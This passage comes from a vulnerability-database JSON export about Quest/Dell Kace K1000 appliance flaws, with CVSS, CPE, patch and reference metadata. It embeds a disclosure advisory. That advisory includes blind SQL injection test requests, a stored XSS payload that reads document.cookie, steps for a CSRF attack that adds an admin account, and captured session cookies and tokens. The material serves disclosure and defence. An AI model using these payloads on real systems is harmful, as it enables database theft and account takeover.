KONEA=ebWI%2BP%2FFEgmTioFCZ3xVTgsN174jAtY0mkDdAov5uZtJEpn2FziBYMEinZsmN63zlNfEooUtIXJDgiJgmSKfFk3VvQguPiEAYQIaYpMhcFRQkfyANLWQy2tJzS8mByjYxJZlBRcYhJYlVqAMppyuikdVPOQRynpbiRNSIqVlX0wyxIBFaoF4b8O09p4wYkritpr1qM%2BMoLmA2n3%2BQCY2u%2FvD8DdrIVtm8t2%2BNxMVCCZjfpqpjKef73l7xx2yBxlV9kRG04gPNHXFfv8f4TZB82%2FvurTFqgOWThxp51YjdpWfssEJQsss1O1B3FtYEH0h83Wrl9ABzsRx%2FZafVGjQTw%3D%3D; x-dell-auth-jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJBTVNJZGVudGl0eVByb3ZpZGVyIiwic3ViIjozLCJhdWQiOiJFU01QbGF0Zm9ybSIsImNvbiI6IjRkMzkwY2M2ODMzZTRkMjk4MTI0NzYyYmQwYjdiNzRjIiwiZXhwIjoxNTIxMzA3NTExfQ.S9h0USN7xS0VmeapB6zWqKnAW-e-vd9J9-NrH9383gSXX6K_vEgXSv0FpuPGCtYQ2I3o7gxuYBKxy_qCqp1xd2w2NRowiZb5_WlwoHBWeTnaP3D9Y6Ek4nd9CKgPaZF1Y8TtaZkdbbWWFTdjtpkD3CK5eNHX_lsqtPD_gVJWwxc\nConnection: close\n\n2. Make a note of Content-Length in the response body. \n\n3. Send following request:\n\nhttp://192.168.247.100/common/ajax_lookup_list.php?query_type=submitter\u0026parent_mapping=false\u0026place_holder=Unassigned\u0026suppress_place_holder_as_choice=false\u0026selected=13\u0026selvalue=13\u0027\u0026queue_id=1\u0026limit=10\u0026org_id=1\u0026locale=en_US\u0026id=13\n\n4. Response to above request shows that an error occurred and we are being redirected to /common/error.php\n\n5. Final payload to check if we get the original response back:\n\nhttp://192.168.247.100/common/ajax_lookup_list.php?query_type=submitter\u0026parent_mapping=false\u0026place_holder=Unassigned\u0026suppress_place_holder_as_choice=false\u0026selected=13\u0026selvalue=13\u0027\u0027\u0026queue_id=1\u0026limit=10\u0026org_id=1\u0026locale=en_US\u0026id=13\n\n6. These tests confirm that the \u0027selvalue\u0027 parameter is indeed vulnerable to Blind SQL Injection. This can further be exploited by modifying the payload or using SQLMap to retrieve some sensitive information from the database. \n\n\n\n=========================================================================================================================================================\n2. Blind SQL Injection Vulnerability in Oval_Detail.PHP (CVE-2018-5404)\n=========================================================================================================================================================\n\nThe Dell Kace allows Admin users to view OVAL templates via \u0027oval_detail.php\u0027, that can be accessed by a user with \u2018Read Only Administrator\u2019 rights. Also, the user input supplied to ID parameter is not sanitized that leads to a Blind SQL Injection vulnerability. \nAn authenticated user with \u2018Read Only Administrator\u2019 rights could exploit this vulnerability to retrieve sensitive information from the database. \n\n#Proof-Of-Concept:\n------------------\n1. Send following request to the target:\n\nGET /adminui/oval_detail.php?ID=6200 HTTP/1.1\nHost: 192.168.247.100\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.247.100/adminui/oval_list.php\nCookie: kbox_nav=1; KACE_LAST_USER=%9A%95%91%5E%AF%B2%A6%FA%02M%B5%7D%08%87%D52; KACE_LAST_ORG=%DE%A3%0E20%8E%84%BF%B1%D5%89%E0%A8%E6%2A%FD; kboxid=i48m8gm8kcnbiptc28pq8u7uq1; KACE_CSRF_TOKEN=96acbdac36b0143958a7d96ba318eb5c626884d46733a8ed05c88cfe94d80cfdebe6bd9790ff4fec3a79fa988ff828dac4d841356c72eebb015d20c5ffd5a01a; KONEA=xvqV3k6fWuhsnypD45pPw4OPs7fZxUDP24mubodoYiSj8Y8EqJpUnakrq%2BHEefSs0YkzglNboWvUhE%2FuavTZZrkyNPMF1IH2QB%2FIF7jSm6fLukuuMyLgTFZWtOg16t5eJqCXvn0f54tfwFnfB1tobY%2Fu6MDe8BOWKaj6mByvdD6kNREg%2B%2FLwAcfIYmgJNKYu0Wd9JwsRpWpuRyZkejbrZB%2FSlkh80oHvHSey0inQmIy7B4bYnPCPUfTU8qPeZLaPcvYFchruj%2BabBazlHAaq44txeUy2AtG85ntiN8XPXoZnflHOD%2B5WjTywTtRGiRpCQVQNDbHTOdSUuljpDEyjrw%3D%3D; x-dell-auth-jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJBTVNJZGVudGl0eVByb3ZpZGVyIiwic3ViIjo0LCJhdWQiOiJFU01QbGF0Zm9ybSIsImNvbiI6ImVlMTk3ZGE5NmFmYTRiYzViYzk5Y2VhMzI3ZjQ2OTdiIiwiZXhwIjoxNTIxMjk3MzE5fQ.GHuAWu_mcviKl0HQcFjY0In5aJxgB-WZCaHP5XQMdpdboby0b1qnwh4DyC3TQg4PktBm_D0Vu4LOMY5KWGRvwOQCTwrzBFLg3ogsKWb0AMO3RArrENXxEO3P3K6XFQCEIlpU9n9K1APnnRSTsfPEL7GC5GkzixakXAlZMZzLB_0\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n2. Response to above request shows some content with the content length of 32109 bytes:\n\n3. It shows information about OVAL-ID#24253:\n\n4. Now send following payload that tests this ID parameter for a true condition:\n\n\thttp://192.168.247.100/adminui/oval_detail.php?ID=6200+AND+6432=6432\n\n5. Response to above request again shows information about the same OVAL-ID#24252:\n\n6. Now, use following payload to test this ID parameter for a false condition:\n\t\n\thttp://192.168.247.100/adminui/oval_detail.php?ID=6200+AND+6432=6444\n\n7. The response to false condition is different than the response to normal and/or true condition. This response does not show any information about any OVAL-ID:\n\n8. These tests confirm that the ID parameter is indeed vulnerable to Blind SQL Injection. This can further be exploited by modifying the payload or using SQLMap to retrieve some sensitive information from the database. \n\n=========================================================================================================================================================\n3. This script executes every time a user visits this page. \n\n#Proof-Of-Concept:\n------------------\n1. Log into the Dell Kace K1000 web interface as a least privileged user. \n2. Navigate to Service Desk--\u003eTickets and create a new ticket. \n3. Inject following payload in the Summary section:\n\t\n\tTest Ticket\u003c/textarea\u003e\u003c/div\u003e\u003c/div\u003e\u003cscript\u003ealert(\"XSSinSummary\");alert(document.cookie);\u003c/script\u003e\u003c!--\n\n4. Save the ticket. \n5. Go back to tickets and view this newly created ticket and a couple of alert boxes should pop up. \n6. \n\n\n=========================================================================================================================================================\n4. Misconfigured CORS Vulnerability (CVE-2018-5406)\n=========================================================================================================================================================\n\nThe Dell Kace K1000 fails to implement Cross Origin Resource Sharing (CORS) properly, that leads to a Cross Site Request Forgery (CSRF) attack. \n\nAn unauthenticated, remote attacker could exploit this vulnerability to perform sensitive actions such as adding a new administrator account or changing appliance\u2019s settings. Also, malicious internal user of the organization could induce an administrator of this appliance to visit a malicious link that exploits this vulnerability to perform sensitive actions such as adding a new administrator account or changing appliance\u2019s settings. \n\n\n#Proof-Of-Concept:\n------------------\n1. Try to create a new user and capture the request in BurpSuite to create a CSRF PoC from there. Create an HTML form and put it under Web Root of your Kali machine. \n2. Log into the web interface of the appliance as admin. \n3. Open a new tab in the same browser and access the HTML page from #1\n4. Save the ticket. \n5. Submit the request (This can be modified to submit the request automatically). \n6. Check BurpSuite to see if the request to add user \u2018Hacker\u2019 was sent to the appliance and if it was originated from your Kali machine\n7. Check the admin console to see if user Hacker has been added:\n\n===================================\n#Vulnerability Disclosure Timeline:\n===================================\n\n04/2018: Submitted report to CERT-US. \n04/2018: CERT-US reported the issue to vendor. \n05/2018: Awaiting vendor response. \n10/2018: Vendor asked to test the patch as they have fixed these issues already. \n10/2018: Confirmed that all the vulnerabilities except Vulnerability#2 is fixed in 9.0.270 and still exists in other patched version. \n01/2019: Vendor confirmed that they are working on fixing all of the vulnerabilities and would release a patch on May 01 2019 and asked to publish this on June 01 2019 so that customers have enough time to patch. \n05/2019: Vendor published an advisory. \n06/2019: CERT-US published a Vulnerability Note, VU#877837",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-5405"
},
{
"db": "CERT/CC",
"id": "VU#877837"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015577"
},
{
"db": "CNVD",
"id": "CNVD-2019-21111"
},
{
"db": "PACKETSTORM",
"id": "153150"
}
],
"trust": 2.97
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-5405",
"trust": 3.9
},
{
"db": "CERT/CC",
"id": "VU#877837",
"trust": 3.9
},
{
"db": "PACKETSTORM",
"id": "153150",
"trust": 2.5
},
{
"db": "JVN",
"id": "JVNVU91210160",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015577",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2019-21111",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201906-042",
"trust": 0.6
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#877837"
},
{
"db": "CNVD",
"id": "CNVD-2019-21111"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015577"
},
{
"db": "PACKETSTORM",
"id": "153150"
},
{
"db": "NVD",
"id": "CVE-2018-5405"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-042"
}
]
},
"id": "VAR-201906-1119",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21111"
}
],
"trust": 1.2666667
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21111"
}
]
},
"last_update_date": "2023-12-18T12:28:09.282000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "CERT Coordination Center report update (288310)",
"trust": 0.8,
"url": "https://support.quest.com/ja-jp/kb/288310/cert-coordination-center-report-update"
},
{
"title": "Patch for QuestSoftwareKaceK1000Appliance Cross-Site Scripting Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/166969"
},
{
"title": "Quest Software Kace K1000 Appliance Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=93134"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21111"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015577"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-042"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015577"
},
{
"db": "NVD",
"id": "CVE-2018-5405"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.0,
"url": "https://www.kb.cert.org/vuls/id/877837/"
},
{
"trust": 3.0,
"url": "http://packetstormsecurity.com/files/153150/dell-kace-system-management-appliance-sma-xss-sql-injection.html"
},
{
"trust": 2.5,
"url": "https://support.quest.com/kb/288310/cert-coordination-center-report-update"
},
{
"trust": 1.6,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5405"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5405"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5404"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5406"
},
{
"trust": 0.8,
"url": "https://support.quest.com/kace-systems-management-appliance/9.1/download-new-releaseshttps://support.quest.com/https://support.quest.com/kb/288310/cert-coordination-center-report-update"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu91210160/index.html"
},
{
"trust": 0.1,
"url": "http://192.168.247.100/adminui/oval_detail.php?id=6200+and+6432=6444"
},
{
"trust": 0.1,
"url": "http://192.168.247.100/common/ajax_lookup_list.php?query_type=submitter\u0026parent_mapping=false\u0026place_holder=unassigned\u0026suppress_place_holder_as_choice=false\u0026selected=13\u0026selvalue=13\u0027\u0027\u0026queue_id=1\u0026limit=10\u0026org_id=1\u0026locale=en_us\u0026id=13"
},
{
"trust": 0.1,
"url": "https://www.kb.cert.org/vuls/id/877837/]"
},
{
"trust": 0.1,
"url": "http://192.168.247.100/common/ajax_lookup_list.php?query_type=submitter\u0026parent_mapping=false\u0026place_holder=unassigned\u0026suppress_place_holder_as_choice=false\u0026selected=13\u0026selvalue=13\u0027\u0026queue_id=1\u0026limit=10\u0026org_id=1\u0026locale=en_us\u0026id=13"
},
{
"trust": 0.1,
"url": "http://192.168.247.100/adminui/oval_detail.php?id=6200+and+6432=6432"
},
{
"trust": 0.1,
"url": "http://192.168.247.100/userui/ticket.php?queue_id=1"
},
{
"trust": 0.1,
"url": "https://www.quest.com/products/kace-systems-management-appliance/]"
},
{
"trust": 0.1,
"url": "http://192.168.247.100/adminui/oval_list.php"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5406"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#877837"
},
{
"db": "CNVD",
"id": "CNVD-2019-21111"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015577"
},
{
"db": "PACKETSTORM",
"id": "153150"
},
{
"db": "NVD",
"id": "CVE-2018-5405"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-042"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#877837"
},
{
"db": "CNVD",
"id": "CNVD-2019-21111"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015577"
},
{
"db": "PACKETSTORM",
"id": "153150"
},
{
"db": "NVD",
"id": "CVE-2018-5405"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-042"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-01T00:00:00",
"db": "CERT/CC",
"id": "VU#877837"
},
{
"date": "2019-07-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-21111"
},
{
"date": "2019-06-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015577"
},
{
"date": "2019-06-03T20:53:31",
"db": "PACKETSTORM",
"id": "153150"
},
{
"date": "2019-06-03T19:29:01.657000",
"db": "NVD",
"id": "CVE-2018-5405"
},
{
"date": "2019-06-03T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-042"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-03T00:00:00",
"db": "CERT/CC",
"id": "VU#877837"
},
{
"date": "2019-07-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-21111"
},
{
"date": "2019-06-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015577"
},
{
"date": "2019-10-09T23:41:18.657000",
"db": "NVD",
"id": "CVE-2018-5405"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-042"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "153150"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-042"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest Software Kace K1000 Appliance Cross-Site Scripting Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21111"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-042"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-042"
}
],
"trust": 0.6
}
}
VAR-201906-1118
Vulnerability from variot - Updated: 2023-12-18 12:28The Quest Kace K1000 Appliance, versions prior to 9.0.270, allows an authenticated, remote attacker with least privileges ('User Console Only' role) to potentially exploit multiple Blind SQL Injection vulnerabilities to retrieve sensitive information from the database or copy the entire database. An authenticated remote attacker could leverage Blind SQL injections to obtain sensitive data. The Quest Kace System Management (K1000) Appliance contains multiple vulnerabilities, including a blind SQL injection vulnerability and a stored cross site scripting vulnerability. It also suffers from misconfigurations in the cross-origin resource sharing (CORS) mechanism and improperly validates source communications. QuestSoftwareKaceK1000Appliance is a system management device from QuestSoftware, USA. This product is mainly used for software license management, patch and endpoint security management, software distribution and server monitoring
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201906-1118",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace systems management appliance",
"scope": "lt",
"trust": 1.8,
"vendor": "quest",
"version": "9.0.270"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "quest kace",
"version": null
},
{
"model": "software kace k1000 appliance",
"scope": "lt",
"trust": 0.6,
"vendor": "quest",
"version": "9.0.270"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#877837"
},
{
"db": "CNVD",
"id": "CNVD-2019-21112"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015568"
},
{
"db": "NVD",
"id": "CVE-2018-5404"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:quest:kace_systems_management_appliance_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "9.0.270",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:quest:kace_systems_management_appliance:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-5404"
}
]
},
"cve": "CVE-2018-5404",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-5404",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CNVD-2019-21112",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-5404",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-5404",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2019-21112",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201906-043",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21112"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015568"
},
{
"db": "NVD",
"id": "CVE-2018-5404"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-043"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Quest Kace K1000 Appliance, versions prior to 9.0.270, allows an authenticated, remote attacker with least privileges (\u0027User Console Only\u0027 role) to potentially exploit multiple Blind SQL Injection vulnerabilities to retrieve sensitive information from the database or copy the entire database. An authenticated remote attacker could leverage Blind SQL injections to obtain sensitive data. The Quest Kace System Management (K1000) Appliance contains multiple vulnerabilities, including a blind SQL injection vulnerability and a stored cross site scripting vulnerability. It also suffers from misconfigurations in the cross-origin resource sharing (CORS) mechanism and improperly validates source communications. QuestSoftwareKaceK1000Appliance is a system management device from QuestSoftware, USA. This product is mainly used for software license management, patch and endpoint security management, software distribution and server monitoring",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-5404"
},
{
"db": "CERT/CC",
"id": "VU#877837"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015568"
},
{
"db": "CNVD",
"id": "CNVD-2019-21112"
}
],
"trust": 2.88
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-5404",
"trust": 3.8
},
{
"db": "CERT/CC",
"id": "VU#877837",
"trust": 3.8
},
{
"db": "JVN",
"id": "JVNVU91210160",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015568",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2019-21112",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201906-043",
"trust": 0.6
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#877837"
},
{
"db": "CNVD",
"id": "CNVD-2019-21112"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015568"
},
{
"db": "NVD",
"id": "CVE-2018-5404"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-043"
}
]
},
"id": "VAR-201906-1118",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21112"
}
],
"trust": 1.2666667
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21112"
}
]
},
"last_update_date": "2023-12-18T12:28:09.252000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.quest.com/"
},
{
"title": "QuestSoftwareKaceK1000ApplianceSQL injection vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/166971"
},
{
"title": "Quest Software Kace K1000 Appliance SQL Repair measures for injecting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=93135"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21112"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015568"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-043"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015568"
},
{
"db": "NVD",
"id": "CVE-2018-5404"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
